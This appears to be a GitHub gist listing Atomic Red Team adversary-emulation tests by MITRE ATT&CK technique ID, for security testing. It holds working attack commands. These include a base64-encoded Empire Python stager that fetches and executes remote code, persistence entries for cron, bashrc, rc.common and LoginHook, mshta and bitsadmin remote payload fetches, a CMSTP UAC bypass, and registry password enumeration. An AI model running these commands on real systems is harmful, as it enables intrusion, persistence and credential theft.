| [********BEGIN TEST*******] AppleScript T1155 has 1 Test(s) | |
| AppleScript | |
| Shell Script with AppleScript | |
| reference | |
| https://github.com/EmpireProject/Empire | |
| osascript "do shell script "echo \"import sys,base64,warnings;warnings.filterwarnings('ignore');exec(base64.b64decode('aW1wb3J0IHN5cztpbXBvcnQgcmUsIHN1YnByb2Nlc3M7Y21kID0gInBzIC1lZiB8IGdyZXAgTGl0dGxlXCBTbml0Y2ggfCBncmVwIC12IGdyZXAiCnBzID0gc3VicHJvY2Vzcy5Qb3BlbihjbWQsIHNoZWxsPVRydWUsIHN0ZG91dD1zdWJwcm9jZXNzLlBJUEUpCm91dCA9IHBzLnN0ZG91dC5yZWFkKCkKcHMuc3Rkb3V0LmNsb3NlKCkKaWYgcmUuc2VhcmNoKCJMaXR0bGUgU25pdGNoIiwgb3V0KToKICAgc3lzLmV4aXQoKQppbXBvcnQgdXJsbGliMjsKVUE9J01vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQ7IFRyaWRlbnQvNy4wOyBydjoxMS4wKSBsaWtlIEdlY2tvJztzZXJ2ZXI9J2h0dHA6Ly8xMjcuMC4wLjE6ODAnO3Q9Jy9sb2dpbi9wcm9jZXNzLnBocCc7cmVxPXVybGxpYjIuUmVxdWVzdChzZXJ2ZXIrdCk7CnJlcS5hZGRfaGVhZGVyKCdVc2VyLUFnZW50JyxVQSk7CnJlcS5hZGRfaGVhZGVyKCdDb29raWUnLCJzZXNzaW9uPXQzVmhWT3MvRHlDY0RURnpJS2FuUnhrdmszST0iKTsKcHJveHkgPSB1cmxsaWIyLlByb3h5SGFuZGxlcigpOwpvID0gdXJsbGliMi5idWlsZF9vcGVuZXIocHJveHkpOwp1cmxsaWIyLmluc3RhbGxfb3BlbmVyKG8pOwphPXVybGxpYjIudXJsb3BlbihyZXEpLnJlYWQoKTsKSVY9YVswOjRdO2RhdGE9YVs0Ol07a2V5PUlWKyc4Yzk0OThmYjg1YmQ1MTE5ZGQ5ODQ4MTJlZTVlOTg5OSc7UyxqLG91dD1yYW5nZSgyNTYpLDAsW10KZm9yIGkgaW4gcmFuZ2UoMjU2KToKICAgIGo9KGorU1tpXStvcmQoa2V5W2klbGVuKGtleSldKSklMjU2CiAgICBTW2ldLFNbal09U1tqXSxTW2ldCmk9aj0wCmZvciBjaGFyIGluIGRhdGE6CiAgICBpPShpKzEpJTI1NgogICAgaj0oaitTW2ldKSUyNTYKICAgIFNbaV0sU1tqXT1TW2pdLFNbaV0KICAgIG91dC5hcHBlbmQoY2hyKG9yZChjaGFyKV5TWyhTW2ldK1Nbal0pJTI1Nl0pKQpleGVjKCcnLmpvaW4ob3V0KSkK'));\" | python &"" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] .bash_profile and .bashrc T1156 has 1 Test(s) | |
| .bash_profile and .bashrc | |
| xxx | |
| echo "#{script}" >> ~/.bash_profile | |
| echo "#{script}" >> ~/.bashrc | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Hidden Files and Directories T1158 has 10 Test(s) | |
| Create a hidden file in a hidden directory | |
| Creates a hidden file inside a hidden directory | |
| mkdir .hidden-directory | |
| echo "this file is hidden" > .hidden-directory/.hidden-file | |
| Mac Hidden file | |
| TODO | |
| sudo xattr -lr * / 2>&1 /dev/null | grep -C 2 "00 00 00 00 00 00 00 00 40 00 FF FF FF FF 00 00" | |
| Hidden file | |
| mv file to a .file | |
| mv #{filename} .#{output_filename} | |
| Hidden files | |
| Requieres Apple Dev Tools | |
| setfile -a V #{filename} | |
| Hide a Directory | |
| xxx | |
| chflags hidden #{filename} | |
| Show all hidden files | |
| xxx | |
| defaults write com.apple.finder AppleShowAllFiles YES | |
| Create visible Directories | |
| xxx | |
| mkdir visible-directory | |
| echo "this file is visible" > visible-directory/visible-file | |
| ls | |
| ls visible-directory | |
| Create hidden directories and files | |
| xxx | |
| mkdir .hidden-directory | |
| echo "this file is hidden" > .hidden-directory/.hidden-file | |
| ls -la | |
| ls -la .hidden-directory | |
| Create ADS command prompt | |
| Create an Alternate Data Stream with the command prompt. Write access is required. | |
| echo "test" > #{file_name}:#{ads_filename} | |
| echo "test" > :#{ads_filename} | |
| dir /s /r | find ":$DATA" | |
| Create ADS PowerShell | |
| Create an Alternate Data Stream with PowerShell. Write access is required. | |
| echo "test" > #{file_name} | set-content -path test.txt -stream #{ads_filename} -value "test" | |
| set-content -path #{file_name} -stream #{ads_filename} -value "test2" | |
| set-content -path . -stream #{ads_filename} -value "test3" | |
| ls -Recurse | %{ gi $_.Fullname -stream *} | where stream -ne ':$Data' | Select-Object pschildname | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Launch Agent T1159 has 1 Test(s) | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Launch Daemon T1160 has 1 Test(s) | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] rc.common T1163 has 1 Test(s) | |
| rc.common | |
| Modify rc.common | |
| [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html) | |
| echo osascript -e 'tell app "Finder" to display dialog "Hello World"' >> /etc/rc.common | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Re-Opened Applications T1164 has 2 Test(s) | |
| Re-Opened Applications | |
| Mac Defaults | |
| [Reference](https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CustomLogin.html) | |
| sudo defaults write com.apple.loginwindow LoginHook #{script} | |
| sudo defaults delete com.apple.loginwindow LoginHook | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Startup Items T1165 has 2 Test(s) | |
| Startup Items (emond rule) | |
| Establish persistence via a rule run by emond daemon at startup, based on https://posts.specterops.io/leveraging-emond-on-macos-for-persistence-a040a2785124 | |
| sudo cp "#{plist}" /etc/emond.d/rules/T1165_emond.plist | |
| sudo touch /private/var/db/emondClients/T1165 | |
| #Clean up | |
| sudo rm /etc/emond.d/rules/T1165_emond.plist | |
| sudo rm /private/var/db/emondClients/T1165 | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Setuid and Setgid T1166 has 1 Test(s) | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Local Job Scheduling T1168 has 2 Test(s) | |
| Cron Job | |
| TODO | |
| echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] SUDO T1169 has 1 Test(s) | |
| Sudo usage | |
| Common Sudo enumeration methods. | |
| sudo -l | |
| sudo su | |
| cat /etc/sudoers | |
| vim /etc/sudoers | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Mshta T1170 has 1 Test(s) | |
| Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject | |
| Test execution of a remote script using mshta.exe | |
| mshta.exe javascript:a=GetObject("script:#{file_url}").Exec();close(); | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Dynamic Data Exchange T1173 has 1 Test(s) | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Browser Extensions T1176 has 3 Test(s) | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Hooking T1179 has 1 Test(s) | |
| Hook PowerShell TLS Encrypt/Decrypt Messages | |
| Hooks functions in PowerShell to read TLS Communications | |
| mavinject $pid /INJECTRUNNING #{file_name} | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Image File Execution Options T1183 has 2 Test(s) | |
| IFEO Add Debugger | |
| TODO | |
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}" | |
| IFEO GLobal Flags | |
| Leverage Global Flags Settings | |
| REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\#{target_binary}" /v GlobalFlag /t REG_DWORD /d 512 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v ReportingMode /t REG_DWORD /d 1 REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\#{target_binary}" /v MonitorProcess /d "#{payload_binary}" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] CMSTP T1191 has 2 Test(s) | |
| CMSTP Executing Remote Scriptlet | |
| Adversaries may supply CMSTP.exe with INF files infected with malicious commands | |
| cmstp.exe /s #{inf_file_path} | |
| CMSTP Executing UAC Bypass | |
| Adversaries may invoke cmd.exe (or other malicious commands) by embedding them in the RunPreSetupCommandsSection of an INF file | |
| cmstp.exe #{inf_file_path} /au | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Spearphishing Attachment T1193 has 1 Test(s) | |
| Download Spearphishing Attachment | |
| The macro-enabled Excel file contains a script which makes a PowerShell webrequest to google. The PowerShell script | |
| below will successfully download the macro-enabled Excel file, but the file will be corrupted, I'm not sure why | |
| this error is happening, but I wanted to at least get the Excel file for anyone who needs to use it. | |
| [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 | |
| Invoke-WebRequest -Uri https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1193/PhishingInvoice.xlsm?raw=true -OutFile PhishingInvoice.xlsm | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] BITS Jobs T1197 has 2 Test(s) | |
| Download & Execute | |
| This test simulates an adversary leveraging bitsadmin.exe to download | |
| and execute a payload | |
| bitsadmin.exe /transfer /Download /priority Foreground https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md %TEMP%\bitsadmin_flag.ps1 | |
| Download & Execute via PowerShell BITS | |
| This test simulates an adversary leveraging bitsadmin.exe to download | |
| and execute a payload leveraging PowerShell | |
| Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md -Destination $env:TEMP\AtomicRedTeam\bitsadmin_flag.ps1 | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Password Policy Discovery T1201 has 4 Test(s) | |
| Examine password complexity policy - Ubuntu | |
| Lists the password complexity policy to console on Ubuntu Linux. | |
| cat /etc/pam.d/common-password | |
| Examine password complexity policy - CentOS/RHEL 7.x | |
| Lists the password complexity policy to console on CentOS/RHEL 7.x Linux. | |
| cat /etc/security/pwquality.conf | |
| Examine password complexity policy - CentOS/RHEL 6.x | |
| Lists the password complexity policy to console on CentOS/RHEL 6.x Linux. | |
| cat /etc/pam.d/system-auth | |
| cat /etc/security/pwquality.conf | |
| Examine password expiration policy - All Linux | |
| Lists the password expiration policy to console on CentOS/RHEL/Ubuntu. | |
| cat /etc/login.defs | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Indirect Command Execution T1202 has 2 Test(s) | |
| Indirect Command Execution - pcalua.exe | |
| The Program Compatibility Assistant (pcalua.exe) may invoke the execution of programs and commands from a Command-Line Interface. | |
| [Reference](https://twitter.com/KyleHanslovan/status/912659279806640128) | |
| pcalua.exe -a #{process} | |
| pcalua.exe -a #{payload_path} | |
| pcalua.exe -a #{payload_cpl_path} | |
| Indirect Command Execution - forfiles.exe | |
| forfiles.exe may invoke the execution of programs and commands from a Command-Line Interface. | |
| [Reference](https://github.com/api0cradle/LOLBAS/blob/master/OSBinaries/Forfiles.md) | |
| "This is basically saying for each occurrence of notepad.exe in c:\windows\system32 run calc.exe" | |
| forfiles /p c:\windows\system32 /m notepad.exe /c #{process} | |
| forfiles /p c:\windows\system32 /m notepad.exe /c "c:\folder\normal.dll:evil.exe" | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] DCShadow T1207 has 1 Test(s) | |
| [!!!!!!!!END TEST!!!!!!!] | |
| [********BEGIN TEST*******] Credentials in Registry T1214 has 1 Test(s) | |
| Enumeration for Credentials in Registry | |
| Queries to enumerate for credentials in the Registry. | |
| reg query HKLM /f password /t REG_SZ /s | |
| reg query HKCU /f password /t REG_SZ /s | |
| [!!!!!!!!END TEST!!!!!!!] | |
| _.-^^---....,,-- | |
| _-- --_ | |
| < >) | |
| | | | |
| \._ _./ | |
| ```--. . , ; .--''' | |
| | | | | |
| .-=|| | |=-. | |
| `-=#$%&%$#=-' | |
| | ; :| | |
| _____.,-#%&$@%#&#~,._____ | |
| Test Complete, Go Sift Through The Fallout |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment